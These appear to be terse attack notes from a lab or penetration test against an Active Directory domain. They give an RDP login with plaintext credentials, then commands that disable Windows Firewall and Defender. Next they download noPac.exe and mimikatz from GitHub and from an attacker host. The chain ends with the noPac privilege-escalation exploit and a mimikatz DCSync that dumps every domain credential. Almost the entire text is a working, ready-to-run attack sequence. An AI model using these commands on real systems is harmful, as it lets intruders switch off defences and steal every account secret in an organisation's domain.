xfreerdp /d:newyork.local /u:mateo.pacheco /p:'elsenorpacheco' /v:192.168.56.10 /size:80% /cert-ignore
disable firewall and defender
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
#disable defender
Set-MpPreference -DisableRealtimeMonitoring $true
wget https://github.com/TryA9ain/noPac/releases/download/v1.0/noPac.exe
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/noPac.exe', 'C:\Users\mateo.pacheco\desktop\noPac.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/mimikatz_trunk.zip', 'C:\Users\mateo.pacheco\desktop\mimikatz_trunk.zip')
this is going to get a TGT, export it as a .kirbi and import the .kibir as ticket.kirbi
.\noPac.exe /domain newyork.local /dc nyc.newyork.local /mAccount test1b$ /mPassword "TesT1b13!#@" /user donald.trump /pass MaKeam3ricaGr3at /service cifs /ptt
.\mimikatz
lsadump::dcsync /domain:newyork.local /all